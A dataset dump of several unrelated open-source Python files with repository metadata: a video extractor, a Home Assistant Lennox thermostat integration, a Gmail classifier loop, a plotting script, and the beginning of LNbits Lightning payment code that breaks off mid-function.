r'<div class="meta">\s*<time class="timeago" datetime="([^"]+)">',
webpage, 'upload date', fatal=False))
uploader = self._search_regex(
r'rel="author">([^<]+)</a>',
webpage, 'uploader', default=None)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'uploader': uploader,
'formats': formats,
}
class ABCOTVSClipsIE(InfoExtractor):
IE_NAME = 'abcotvs:clips'
_VALID_URL = r'https?://clips\.abcotvs\.com/(?:[^/]+/)*video/(?P<id>\d+)'
_TEST = {
'url': 'https://clips.abcotvs.com/kabc/video/214814',
'info_dict': {
'id': '214814',
'ext': 'mp4',
'title': 'SpaceX launch pad explosion destroys rocket, satellite',
'description': 'md5:9f186e5ad8f490f65409965ee9c7be1b',
'upload_date': '20160901',
'timestamp': 1472756695,
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
video_data = self._download_json('https://clips.abcotvs.com/vogo/video/getByIds?ids=' + video_id, video_id)['results'][0]
title = video_data['title']
formats = self._extract_m3u8_formats(
video_data['videoURL'].split('?')[0], video_id, 'mp4')
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': video_data.get('description'),
'thumbnail': video_data.get('thumbnailURL'),
'duration': int_or_none(video_data.get('duration')),
'timestamp': int_or_none(video_data.get('pubDate')),
'formats': formats,
}
| 35.530973
| 130
| 0.534247
|
0c7f6095ec7e830cc7fb0a0eaadedcc556ce15c2
| 27,149
|
py
|
Python
|
custom_components/lennoxs30/__init__.py
|
HyperActiveJ/lennoxs30
|
28efd9a447ec82dd84d61d9c631e183a4168cdce
|
[
"MIT"
] | null | null | null |
custom_components/lennoxs30/__init__.py
|
HyperActiveJ/lennoxs30
|
28efd9a447ec82dd84d61d9c631e183a4168cdce
|
[
"MIT"
] | null | null | null |
custom_components/lennoxs30/__init__.py
|
HyperActiveJ/lennoxs30
|
28efd9a447ec82dd84d61d9c631e183a4168cdce
|
[
"MIT"
] | null | null | null |
"""Support for Lennoxs30 cloud api"""
import asyncio
from asyncio.locks import Event, Lock
import logging
from lennoxs30api.s30exception import EC_COMMS_ERROR, EC_CONFIG_TIMEOUT
from lennoxs30api import (
EC_HTTP_ERR,
EC_LOGIN,
EC_SUBSCRIBE,
EC_UNAUTHORIZED,
S30Exception,
s30api_async,
)
import voluptuous as vol
from .const import (
CONF_ALLERGEN_DEFENDER_SWITCH,
CONF_APP_ID,
CONF_CREATE_INVERTER_POWER,
CONF_CREATE_SENSORS,
CONF_FAST_POLL_INTERVAL,
CONF_FAST_POLL_COUNT,
CONF_INIT_WAIT_TIME,
CONF_LOG_MESSAGES_TO_FILE,
CONF_MESSAGE_DEBUG_FILE,
CONF_MESSAGE_DEBUG_LOGGING,
CONF_PII_IN_MESSAGE_LOGS,
DEFAULT_CLOUD_TIMEOUT,
DEFAULT_LOCAL_TIMEOUT,
LENNOX_DEFAULT_CLOUD_APP_ID,
LENNOX_DEFAULT_LOCAL_APP_ID,
LENNOX_DOMAIN,
CONF_CLOUD_CONNECTION,
MANAGER,
)
from .device import (
S30ControllerDevice,
S30IndoorUnit,
S30OutdoorUnit,
S30ZoneThermostat,
)
from .util import dict_redact_fields, redact_email
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from typing import Any
DOMAIN = LENNOX_DOMAIN
DOMAIN_STATE = "lennoxs30.state"
PLATFORMS = ["sensor", "climate", "switch", "number", "binary_sensor"]
DS_CONNECTING = "Connecting"
DS_DISCONNECTED = "Disconnected"
DS_LOGIN_FAILED = "Login Failed"
DS_CONNECTED = "Connected"
DS_RETRY_WAIT = "Waiting to Retry"
DS_FAILED = "Failed"
from homeassistant.const import (
CONF_HOST,
CONF_EMAIL,
CONF_HOSTS,
CONF_PASSWORD,
CONF_PROTOCOL,
CONF_SCAN_INTERVAL,
EVENT_HOMEASSISTANT_STOP,
CONF_TIMEOUT,
)
DEFAULT_POLL_INTERVAL: int = 10
DEFAULT_LOCAL_POLL_INTERVAL: int = 1
DEFAULT_FAST_POLL_INTERVAL: float = 0.75
MAX_ERRORS = 2
RETRY_INTERVAL_SECONDS = 60
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_EMAIL): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_HOSTS, default="Cloud"): str,
vol.Optional(CONF_SCAN_INTERVAL): cv.positive_int,
vol.Optional(
CONF_FAST_POLL_INTERVAL, default=DEFAULT_FAST_POLL_INTERVAL
): cv.positive_float,
vol.Optional(CONF_ALLERGEN_DEFENDER_SWITCH, default=False): cv.boolean,
vol.Optional(CONF_APP_ID): cv.string,
vol.Optional(CONF_INIT_WAIT_TIME, default=30): cv.positive_int,
vol.Optional(CONF_CREATE_SENSORS, default=False): cv.boolean,
vol.Optional(CONF_CREATE_INVERTER_POWER, default=False): cv.boolean,
vol.Optional(CONF_PROTOCOL, default="https"): cv.string,
vol.Optional(CONF_PII_IN_MESSAGE_LOGS, default=False): cv.boolean,
vol.Optional(CONF_MESSAGE_DEBUG_LOGGING, default=True): cv.boolean,
vol.Optional(CONF_MESSAGE_DEBUG_FILE, default=""): cv.string,
}
)
},
extra=vol.ALLOW_EXTRA,
)
_LOGGER = logging.getLogger(__name__)
async def async_setup(hass: HomeAssistant, config: ConfigType):
"""Import config as config entry."""
hass.data[DOMAIN] = {}
if config.get(DOMAIN) is None:
return True
_LOGGER.warning(
"Configuration of the LennoxS30 platform in YAML is deprecated "
"and will be removed; Your existing configuration "
"has been imported into the UI automatically and can be safely removed "
"from your configuration.yaml file"
)
conf_hosts: str = config.get(DOMAIN).get(CONF_HOSTS)
host_list = []
if conf_hosts == "Cloud":
conf_hosts = None
host_list.append(None)
else:
host_list = conf_hosts.split(",")
for host_name in host_list:
cloud_connection: bool = False
if host_name == None:
cloud_connection = True
log_to_file = True
if config.get(DOMAIN).get(CONF_MESSAGE_DEBUG_FILE) == "":
log_to_file = False
conf_scan_interval = config.get(DOMAIN).get(CONF_SCAN_INTERVAL)
if conf_scan_interval is None:
if cloud_connection == True:
conf_scan_interval = DEFAULT_POLL_INTERVAL
else:
conf_scan_interval = DEFAULT_LOCAL_POLL_INTERVAL
migration_data = {
CONF_SCAN_INTERVAL: conf_scan_interval,
CONF_FAST_POLL_INTERVAL: config.get(DOMAIN).get(CONF_FAST_POLL_INTERVAL),
CONF_ALLERGEN_DEFENDER_SWITCH: config.get(DOMAIN).get(
CONF_ALLERGEN_DEFENDER_SWITCH
),
CONF_APP_ID: config.get(DOMAIN).get(CONF_APP_ID),
CONF_INIT_WAIT_TIME: config.get(DOMAIN).get(CONF_INIT_WAIT_TIME),
CONF_CREATE_SENSORS: config.get(DOMAIN).get(CONF_CREATE_SENSORS),
CONF_PROTOCOL: config.get(DOMAIN).get(CONF_PROTOCOL),
CONF_PII_IN_MESSAGE_LOGS: config.get(DOMAIN).get(CONF_PII_IN_MESSAGE_LOGS),
CONF_MESSAGE_DEBUG_LOGGING: config.get(DOMAIN).get(
CONF_MESSAGE_DEBUG_LOGGING
),
CONF_MESSAGE_DEBUG_FILE: config.get(DOMAIN).get(CONF_MESSAGE_DEBUG_FILE),
CONF_LOG_MESSAGES_TO_FILE: log_to_file,
CONF_CLOUD_CONNECTION: cloud_connection,
}
if cloud_connection == True:
migration_data[CONF_EMAIL] = config.get(DOMAIN).get(CONF_EMAIL)
migration_data[CONF_PASSWORD] = config.get(DOMAIN).get(CONF_PASSWORD)
if migration_data[CONF_APP_ID] == None:
migration_data[CONF_APP_ID] = LENNOX_DEFAULT_CLOUD_APP_ID
else:
migration_data[CONF_HOST] = host_name
if migration_data[CONF_APP_ID] == None:
migration_data[CONF_APP_ID] = LENNOX_DEFAULT_LOCAL_APP_ID
migration_data[CONF_CREATE_INVERTER_POWER] = config.get(DOMAIN).get(
CONF_CREATE_INVERTER_POWER
)
create_migration_task(hass, migration_data)
return True
def create_migration_task(hass, migration_data):
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=migration_data,
)
)
async def async_migrate_entry(hass, config_entry: ConfigEntry):
if config_entry.version == 1:
old_version = config_entry.version
_LOGGER.debug(
f"Upgrading configuration for [{config_entry.title}] from version [{config_entry.version}]"
)
new = {**config_entry.data}
new[CONF_FAST_POLL_COUNT] = 10
new[CONF_TIMEOUT] = (
DEFAULT_CLOUD_TIMEOUT
if new[CONF_CLOUD_CONNECTION] == True
else DEFAULT_LOCAL_TIMEOUT
)
config_entry.version = 2
hass.config_entries.async_update_entry(config_entry, data=new)
_LOGGER.info(
f"Configuration for [{config_entry.title}] upgraded from version [{old_version}] to version [{config_entry.version}]"
)
return True
# Track the title of the first entry, it gets the S30.State object
_first_entry_title: str = None
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
_LOGGER.debug(
f"async_setup_entry UniqueID [{entry.unique_id}] Data [{dict_redact_fields(entry.data)}]"
)
# Determine if this is the first entry that gets S30.State.
global _first_entry_title
index: int = 1
if _first_entry_title == None:
_first_entry_title = entry.title
if _first_entry_title == entry.title:
index = 0
is_cloud = entry.data[CONF_CLOUD_CONNECTION]
if is_cloud == True:
host_name: str = None
email = entry.data[CONF_EMAIL]
password = entry.data[CONF_PASSWORD]
create_inverter_power: bool = False
conf_protocol: str = None
else:
host_name = entry.data[CONF_HOST]
email: str = None
password: str = None
create_inverter_power: bool = entry.data[CONF_CREATE_INVERTER_POWER]
conf_protocol: str = entry.data[CONF_PROTOCOL]
if CONF_APP_ID in entry.data:
app_id: str = entry.data[CONF_APP_ID]
else:
app_id: str = None
poll_interval = entry.data[CONF_SCAN_INTERVAL]
fast_poll_interval = entry.data[CONF_FAST_POLL_INTERVAL]
fast_poll_count = entry.data[CONF_FAST_POLL_COUNT]
timeout = entry.data[CONF_TIMEOUT]
allergenDefenderSwitch = entry.data[CONF_ALLERGEN_DEFENDER_SWITCH]
conf_init_wait_time = entry.data[CONF_INIT_WAIT_TIME]
create_sensors = entry.data[CONF_CREATE_SENSORS]
conf_pii_in_message_logs = entry.data[CONF_PII_IN_MESSAGE_LOGS]
conf_message_debug_logging = entry.data[CONF_MESSAGE_DEBUG_LOGGING]
conf_message_debug_file = entry.data[CONF_MESSAGE_DEBUG_FILE]
# If no path specified then it goes into the config directory,
if conf_message_debug_file == "":
conf_message_debug_file = None
_LOGGER.debug(
f"async_setup starting scan_interval [{poll_interval}] fast_scan_interval[{fast_poll_interval}] app_id [{app_id}] config_init_wait_time [{conf_init_wait_time}] create_sensors [{create_sensors}] create_inverter_power [{create_inverter_power}] timeout [{timeout}]"
)
manager = Manager(
hass=hass,
config=entry,
email=email,
password=password,
poll_interval=poll_interval,
fast_poll_interval=fast_poll_interval,
fast_poll_count=fast_poll_count,
timeout=timeout,
allergenDefenderSwitch=allergenDefenderSwitch,
app_id=app_id,
conf_init_wait_time=conf_init_wait_time,
ip_address=host_name,
create_sensors=create_sensors,
create_inverter_power=create_inverter_power,
protocol=conf_protocol,
index=index,
pii_message_logs=conf_pii_in_message_logs,
message_debug_logging=conf_message_debug_logging,
message_logging_file=conf_message_debug_file,
)
try:
listener = hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, manager.async_shutdown
)
await manager.s30_initialize()
except S30Exception as e:
if e.error_code == EC_LOGIN:
# TODO: encapsulate in manager class
manager.updateState(DS_LOGIN_FAILED)
raise HomeAssistantError(
f"Lennox30 unable to login host [{host_name}] - please check credentials and restart Home Assistant"
)
elif e.error_code == EC_CONFIG_TIMEOUT:
_LOGGER.warning("async_setup: " + e.message)
_LOGGER.info("connection will be retried in 1 minute")
asyncio.create_task(manager.initialize_retry_task())
else:
_LOGGER.error("async_setup unexpected error " + e.message)
_LOGGER.info("connection will be retried in 1 minute")
asyncio.create_task(manager.initialize_retry_task())
_LOGGER.debug(f"async_setup complete host [{host_name}]")
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
_LOGGER.debug(f"async_unload_entry entry [{entry.unique_id}]")
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok == True:
entry_data = hass.data[DOMAIN].pop(entry.unique_id)
manager: Manager = entry_data[MANAGER]
try:
await manager.async_shutdown(None)
except S30Exception as e:
_LOGGER.error(
f"async_unload_entry entry [{entry.unique_id}] error [{e.as_string()}]"
)
except Exception as e:
_LOGGER.exception(f"async_unload_entry entry [{entry.unique_id}]")
return True
else:
_LOGGER.error(
f"async_unload_entry call to hass.config_entries.async_unload_platforms returned False"
)
return False
class Manager(object):
def __init__(
self,
hass: HomeAssistant,
config: ConfigEntry,
email: str,
password: str,
poll_interval: int,
fast_poll_interval: float,
fast_poll_count: int,
timeout: int,
allergenDefenderSwitch: bool,
app_id: str,
conf_init_wait_time: int,
ip_address: str,
create_sensors: bool,
create_inverter_power: bool,
protocol: str,
index: int = 0,
pii_message_logs: bool = False,
message_debug_logging: bool = True,
message_logging_file: str = None,
):
self._config_entry: ConfigEntry = config
self._reinitialize: bool = False
self._err_cnt: int = 0
self._mp_wakeup_event: Event = Event()
self._climate_entities_initialized: bool = False
self._hass: HomeAssistant = hass
self._config: ConfigEntry = config
self._poll_interval: int = poll_interval
self._fast_poll_interval: float = fast_poll_interval
self._fast_poll_count: int = fast_poll_count
self._protocol = protocol
self._ip_address = ip_address
self._pii_message_log = pii_message_logs
self._message_debug_logging = message_debug_logging
self._message_logging_file = message_logging_file
self._api: s30api_async = s30api_async(
email,
password,
app_id,
ip_address=ip_address,
protocol=self._protocol,
pii_message_logs=self._pii_message_log,
message_debug_logging=self._message_debug_logging,
message_logging_file=self._message_logging_file,
timeout=timeout,
)
self._shutdown = False
self._retrieve_task = None
self._allergenDefenderSwitch = allergenDefenderSwitch
self._createSensors: bool = create_sensors
self._create_inverter_power: bool = create_inverter_power
self._conf_init_wait_time = conf_init_wait_time
self._is_metric: bool = hass.config.units.is_metric
if index == 0:
self.connection_state = DOMAIN_STATE
else:
if ip_address == None:
e_name = email.split("@")
redacted_email: str = e_name[0].replace(".", "_")
self.connection_state = "lennoxs30.conn_" + redacted_email
else:
self.connection_state = "lennoxs30.conn_" + self._ip_address.replace(
".", "_"
).replace(":", "_")
async def async_shutdown(self, event: Event) -> None:
_LOGGER.debug(f"async_shutdown started host [{self._ip_address}]")
self._shutdown = True
if self._retrieve_task != None:
self._mp_wakeup_event.set()
await self._retrieve_task
await self._api.shutdown()
_LOGGER.debug(f"async_shutdown complete [{self._ip_address}]")
def updateState(self, state: int) -> None:
self._hass.states.async_set(
self.connection_state, state, self.getMetricsList(), force_update=True
)
def getMetricsList(self):
list = self._api.metrics.getMetricList()
# TODO these are at the individual S30 level, when we have a device object we should move this there
systems = self._api.getSystems()
if len(systems) > 0:
system: s30api_async.lennox_system = self._api.getSystems()[0]
if system != None:
list["sysUpTime"] = system.sysUpTime
list["diagLevel"] = system.diagLevel
list["softwareVersion"] = system.softwareVersion
list["hostname"] = self._ip_address
return list
async def s30_initialize(self):
self.updateState(DS_CONNECTING)
await self.connect_subscribe()
await self.configuration_initialization()
# Launch the message pump loop
self._retrieve_task = asyncio.create_task(self.messagePump_task())
# Since there is no change detection implemented to update device attributes like SW version - alwayas reinit
await self.create_devices()
# Only add entities the first time, on reconnect we do not need to add them again
if self._climate_entities_initialized == False:
self._hass.data[DOMAIN][self._config.unique_id] = {MANAGER: self}
for platform in PLATFORMS:
self._hass.async_create_task(
self._hass.config_entries.async_forward_entry_setup(
self._config, platform
)
)
self._climate_entities_initialized = True
self.updateState(DS_CONNECTED)
async def create_devices(self):
for system in self._api._systemList:
s30: S30ControllerDevice = S30ControllerDevice(
self._hass, self._config_entry, system
)
s30.register_device()
if system.has_outdoor_unit:
s30_outdoor_unit = S30OutdoorUnit(
self._hass, self._config_entry, system, s30
)
s30_outdoor_unit.register_device()
if system.has_indoor_unit:
s30_indoor_unit = S30IndoorUnit(
self._hass, self._config_entry, system, s30
)
s30_indoor_unit.register_device()
for zone in system._zoneList:
if zone.is_zone_active() == True:
z: S30ZoneThermostat = S30ZoneThermostat(
self._hass, self._config_entry, system, zone, s30
)
z.register_device()
async def initialize_retry_task(self):
while True:
self.updateState(DS_RETRY_WAIT)
await asyncio.sleep(RETRY_INTERVAL_SECONDS)
self.updateState(DS_CONNECTING)
try:
await self.s30_initialize()
self.updateState(DS_CONNECTED)
return
except S30Exception as e:
if e.error_code == EC_LOGIN:
# TODO: encapsulate in manager class
self.updateState(DS_LOGIN_FAILED)
_LOGGER.error(
f"initialize_retry_task host [{self._ip_address}] {e.as_string()}"
)
return
elif e.error_code == EC_CONFIG_TIMEOUT:
_LOGGER.warning(
f"async_setup: host [{self._ip_address}] {e.as_string()}"
)
_LOGGER.info(
f"connection host [{self._ip_address}] will be retried in 1 minute"
)
else:
_LOGGER.error(
f"async_setup host [{self._ip_address}] unexpected error {e.as_string()}"
)
_LOGGER.info(
f"async setup host [{self._ip_address}] will be retried in 1 minute"
)
async def configuration_initialization(self) -> None:
# Wait for zones to appear on each system
systemsWithZones = 0
loops: int = 0
numOfSystems = len(self._api.getSystems())
# To speed startup, we only want to sleep when a message was not received.
got_message: bool = True
while systemsWithZones < numOfSystems and loops < self._conf_init_wait_time:
_LOGGER.debug(
f"__init__:async_setup waiting for zone config to arrive host [{self._ip_address}] numSystems ["
+ str(numOfSystems)
+ "] systemsWithZones ["
+ str(systemsWithZones)
+ "]"
)
# Only take a breather if we did not get a messagd.
if got_message == False:
await asyncio.sleep(1.0)
systemsWithZones = 0
got_message = await self.messagePump()
for lsystem in self._api.getSystems():
# Issue #33 - system configuration isn't complete until we've received the name from Lennox.
if lsystem.config_complete() == False:
continue
numZones = len(lsystem.getZoneList())
_LOGGER.debug(
f"__init__:async_setup host [{self._ip_address}] wait for zones system ["
+ lsystem.sysId
+ "] numZone ["
+ str(numZones)
+ "]"
)
if numZones > 0:
systemsWithZones += 1
if got_message == False:
loops += 1
if systemsWithZones < numOfSystems:
raise S30Exception(
"Timeout waiting for configuration data from Lennox - this sometimes happens, the connection will be automatically retried. Consult the readme for more details",
EC_CONFIG_TIMEOUT,
1,
)
async def connect(self):
await self._api.serverConnect()
async def connect_subscribe(self):
await self._api.serverConnect()
for lsystem in self._api.getSystems():
await self._api.subscribe(lsystem)
async def reinitialize_task(self) -> None:
while True:
try:
self.updateState(DS_CONNECTING)
_LOGGER.debug(
f"reinitialize_task host [{self._ip_address}] - trying reconnect"
)
await self.connect_subscribe()
self.updateState(DS_CONNECTED)
break
except S30Exception as e:
_LOGGER.error(
f"reinitialize_task host [{self._ip_address}] {e.as_string()}"
)
if e.error_code == EC_LOGIN:
raise HomeAssistantError(
f"Lennox30 unable to login host [{self._ip_address}] - please check credentials and restart Home Assistant"
)
self.updateState(DS_RETRY_WAIT)
await asyncio.sleep(RETRY_INTERVAL_SECONDS)
_LOGGER.debug(
f"reinitialize_task host [{self._ip_address}] - reconnect successful"
)
asyncio.create_task(self.messagePump_task())
async def event_wait_mp_wakeup(self, timeout: float) -> bool:
# suppress TimeoutError because we'll return False in case of timeout
try:
await asyncio.wait_for(self._mp_wakeup_event.wait(), timeout)
except asyncio.TimeoutError as e:
return False
return self._mp_wakeup_event.is_set()
async def messagePump_task(self) -> None:
await asyncio.sleep(self._poll_interval)
self._reinitialize = False
self._err_cnt = 0
fast_polling: bool = False
fast_polling_cd: int = 0
received = False
while self._reinitialize == False:
try:
received = await self.messagePump()
except Exception as e:
_LOGGER.error(
f"messagePump_task host [{self._ip_address}] unexpected exception:"
+ str(e)
)
if fast_polling == True:
fast_polling_cd = fast_polling_cd - 1
if fast_polling_cd <= 0:
fast_polling = False
if self._shutdown == True:
break
if not received:
if fast_polling == True:
res = await asyncio.sleep(
min(self._fast_poll_interval, self._poll_interval)
)
else:
res = await self.event_wait_mp_wakeup(self._poll_interval)
if res == True:
self._mp_wakeup_event.clear()
fast_polling = True
fast_polling_cd = self._fast_poll_count
if self._shutdown == True:
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] is exiting to shutdown"
)
return
elif self._reinitialize == True:
self.updateState(DS_DISCONNECTED)
asyncio.create_task(self.reinitialize_task())
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] is exiting - to enter retries"
)
else:
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] is exiting - and this should not happen"
)
async def messagePump(self) -> bool:
bErr = False
received = False
try:
_LOGGER.debug(f"messagePump_task host [{self._ip_address}] running")
received = await self._api.messagePump()
self.updateState(DS_CONNECTED)
except S30Exception as e:
self._err_cnt += 1
# This should mean we have been logged out and need to start the login process
if e.error_code == EC_UNAUTHORIZED:
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] - unauthorized - trying to relogin"
)
self._reinitialize = True
# If its an HTTP error, we will not log an error, just and info message, unless
# this exceeds the max consecutive error count
elif e.error_code == EC_HTTP_ERR and self._err_cnt < MAX_ERRORS:
_LOGGER.debug(
f"messagePump_task - http error host [{self._ip_address}] {e.as_string()}"
)
# Since the S30 will close connections and kill the subscription periodically, these errors
# are expected. Log as warnings
elif e.error_code == EC_COMMS_ERROR:
_LOGGER.warning(
f"messagePump_task - communication error to host [{self._ip_address}] {e.as_string()}"
)
else:
_LOGGER.warning(
f"messagePump_task - general error host [{self._ip_address}] {e.as_string()}"
)
bErr = True
except Exception as e:
_LOGGER.exception(
f"messagePump_task unexpected exception host [{self._ip_address}]"
)
self._err_cnt += 1
bErr = True
# Keep retrying retrive up until we get this number of errors in a row, at which point will try to reconnect
if self._err_cnt >= MAX_ERRORS:
_LOGGER.info(
f"messagePump_task encountered [{self._err_cnt}] consecutive errors - reinitializing connection"
)
self._reinitialize = True
if bErr is False:
self._err_cnt = 0
return received
| 39.232659
| 270
| 0.617223
|
f5a4accaa2e438696ca90a817c010ee81b29e7fa
| 1,750
|
py
|
Python
|
main.py
|
osilkin98/HappyMail
|
6bc34cd2b35d58757973a267bf01077332770b6d
|
[
"MIT"
] | 1
|
2018-09-20T01:06:11.000Z
|
2018-09-20T01:06:11.000Z
|
main.py
|
osilkin98/HappyMail
|
6bc34cd2b35d58757973a267bf01077332770b6d
|
[
"MIT"
] | null | null | null |
main.py
|
osilkin98/HappyMail
|
6bc34cd2b35d58757973a267bf01077332770b6d
|
[
"MIT"
] | null | null | null |
from src.classifier import EmailClassifier
from src.email_filter import classify_messages, get_email_list
from src.scraper import get_gmail_service
import src.configuration_files.keys as keys
from colorama import Fore
from time import sleep
def run_main_function(sleep_time=60, max_emails=200):
""" This function checks to see if a new message has arrived every (sleep_time) seconds, and if it has, it gets
classified.
:param int sleep_time: Number of seconds to sleep for before checking again
:param int max_emails: Maximum number of emails to look back for
:return: Nothing
"""
classifier = EmailClassifier(model_file=keys.models + '/trained_net.h5')
service = get_gmail_service()
# Initialize the first message ID
first_message_id = None
try:
while True:
# Have it get the email list
messages, first_message_id = get_email_list(service=service,
last_message_id=first_message_id,
max_lookback=max_emails)
# Have the program classify the messages in the inbox
# 'Label_5' is the negative label
classify_messages(negative_label='Label_5', messages=messages,
classifier=classifier, threshold=0.25)
print("first message id: " + first_message_id)
print("Sleeping like a ferret for " + Fore.GREEN + str(sleep_time) + Fore.RESET + " seconds")
# Then have it sleep like a ferret
sleep(sleep_time)
except (KeyboardInterrupt, EOFError) as err:
print("Exiting program")
if __name__ == '__main__':
run_main_function(max_emails=10)
| 38.043478
| 115
| 0.651429
|
06d7bde752486fa316fbabd883cf065b4b6ca286
| 1,589
|
py
|
Python
|
examples/sock/barplot.py
|
iliar-rabet/SDMob
|
14516dece72d57ccf0fcb9c6af17a0bfeeab635f
|
[
"BSD-3-Clause"
] | 1
|
2021-01-21T05:43:32.000Z
|
2021-01-21T05:43:32.000Z
|
examples/sock/barplot.py
|
iliar-rabet/dao-projection
|
e24a00ba29ce92f37bfbcb2595713f2764cd8e9d
|
[
"BSD-3-Clause"
] | null | null | null |
examples/sock/barplot.py
|
iliar-rabet/dao-projection
|
e24a00ba29ce92f37bfbcb2595713f2764cd8e9d
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
# set width of bar
barWidth = 0.025
#fig = plt.subplots(figsize =(12, 8))
# set height of bar
particle_line = [0.566147244933,0.566147244933]
particle_cir = [0.63188589771,0.972161651262]
ukf_line = [0.724651076994, 0.89]
ukf_cir = [0.824651076994, 1.97326041542]
# Set position of bar on X axis
br1 = [0.85, 1.0]
br2 = [x + barWidth for x in br1]
br3 = [x + barWidth for x in br2]
br4 = [x + barWidth for x in br3]
colors = iter([plt.cm.tab20(i) for i in range(20)])
next(colors)
next(colors)
next(colors)
plt.grid(color='#95a5a6', linestyle='--', linewidth=1, axis='y', alpha=0.5)
# Make the plot
plt.bar(br1, particle_line, width = barWidth,
edgecolor ='black', label ='Particle Linear', color=[next(colors)])
next(colors)
plt.bar(br2, particle_cir, width = barWidth,
edgecolor ='black', label ='Particle Circle',color=[next(colors)],hatch = 'x')
plt.bar(br3, ukf_line, width = barWidth,
edgecolor ='black', label ='UKF Linear',color=[next(colors)],hatch = '/')
plt.bar(br4, ukf_cir, width = barWidth,
edgecolor ='black', label ='UKF Circle',color=[next(colors)],hatch = '-')
# Adding Xticks
plt.xlabel('Mobile Node Speed (m/s)', fontweight ='bold',fontsize=14)
plt.ylabel('RMSE (m)', fontweight ='bold',fontsize=14)
legend_properties = {'weight':'bold', 'size':'13'}
plt.xticks([0.895,1.045],
['0.5','1.0'],fontsize=14)
plt.yticks(fontsize=15)
plt.legend(prop=legend_properties)
plt.title("SDMob's Accuracy; Data Interval: 1 s,\n Path Loss Variance=0",fontsize=15)
plt.show()
| 26.04918
| 85
| 0.676526
|
3d54e218d8c4df42e79e29235ec26da13c0002cd
| 11,025
|
py
|
Python
|
lnbits/core/services.py
|
pseudozach/lnbits-legend
|
b90eb0a3ba403d60cc151af12ffabb74fd529db0
|
[
"MIT"
] | 76
|
2021-11-02T22:19:59.000Z
|
2022-03-30T18:01:33.000Z
|
lnbits/core/services.py
|
pseudozach/lnbits-legend
|
b90eb0a3ba403d60cc151af12ffabb74fd529db0
|
[
"MIT"
] | 100
|
2021-11-04T16:33:28.000Z
|
2022-03-30T15:03:52.000Z
|
lnbits/core/services.py
|
pseudozach/lnbits-legend
|
b90eb0a3ba403d60cc151af12ffabb74fd529db0
|
[
"MIT"
] | 57
|
2021-11-08T06:43:59.000Z
|
2022-03-31T08:53:16.000Z
|
import asyncio
import json
from binascii import unhexlify
from io import BytesIO
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlparse
import httpx
from lnurl import LnurlErrorResponse
from lnurl import decode as decode_lnurl # type: ignore
from lnbits import bolt11
from lnbits.db import Connection
from lnbits.helpers import url_for, urlsafe_short_hash
from lnbits.requestvars import g
from lnbits.settings import WALLET
from lnbits.wallets.base import PaymentResponse, PaymentStatus
from . import db
from .crud import (
check_internal,
create_payment,
delete_payment,
get_wallet,
get_wallet_payment,
update_payment_status,
)
try:
from typing import TypedDict # type: ignore
except ImportError: # pragma: nocover
from typing_extensions import TypedDict
class PaymentFailure(Exception):
pass
class InvoiceFailure(Exception):
pass
async def create_invoice(
*,
wallet_id: str,
amount: int, # in satoshis
memo: str,
description_hash: Optional[bytes] = None,
extra: Optional[Dict] = None,
webhook: Optional[str] = None,
conn: Optional[Connection] = None,
) -> Tuple[str, str]:
invoice_memo = None if description_hash else memo
ok, checking_id, payment_request, error_message = await WALLET.create_invoice(
amount=amount, memo=invoice_memo, description_hash=description_hash
)
if not ok:
raise InvoiceFailure(error_message or "Unexpected backend error.")
invoice = bolt11.decode(payment_request)
amount_msat = amount * 1000
await create_payment(
wallet_id=wallet_id,
checking_id=checking_id,
payment_request=payment_request,
payment_hash=invoice.payment_hash,
amount=amount_msat,
memo=memo,
extra=extra,
webhook=webhook,
conn=conn,
)
return invoice.payment_hash, payment_request
async def pay_invoice(
*,
wallet_id: str,
payment_request: str,
max_sat: Optional[int] = None,
extra: Optional[Dict] = None,
description: str = "",
conn: Optional[Connection] = None,
) -> str:
invoice = bolt11.decode(payment_request)
fee_reserve_msat = fee_reserve(invoice.amount_msat)
async with (db.reuse_conn(conn) if conn else db.connect()) as conn:
temp_id = f"temp_{urlsafe_short_hash()}"
internal_id = f"internal_{urlsafe_short_hash()}"
if invoice.amount_msat == 0:
raise ValueError("Amountless invoices not supported.")
if max_sat and invoice.amount_msat > max_sat * 1000:
raise ValueError("Amount in invoice is too high.")
# put all parameters that don't change here
PaymentKwargs = TypedDict(
"PaymentKwargs",
{
"wallet_id": str,
"payment_request": str,
"payment_hash": str,
"amount": int,
"memo": str,
"extra": Optional[Dict],
},
)
payment_kwargs: PaymentKwargs = dict(
wallet_id=wallet_id,
payment_request=payment_request,
payment_hash=invoice.payment_hash,
amount=-invoice.amount_msat,
memo=description or invoice.description or "",
extra=extra,
)
# check_internal() returns the checking_id of the invoice we're waiting for
internal_checking_id = await check_internal(invoice.payment_hash, conn=conn)
if internal_checking_id:
# create a new payment from this wallet
await create_payment(
checking_id=internal_id,
fee=0,
pending=False,
conn=conn,
**payment_kwargs,
)
else:
# create a temporary payment here so we can check if
# the balance is enough in the next step
await create_payment(
checking_id=temp_id,
fee=-fee_reserve_msat,
conn=conn,
**payment_kwargs,
)
# do the balance check
wallet = await get_wallet(wallet_id, conn=conn)
assert wallet
if wallet.balance_msat < 0:
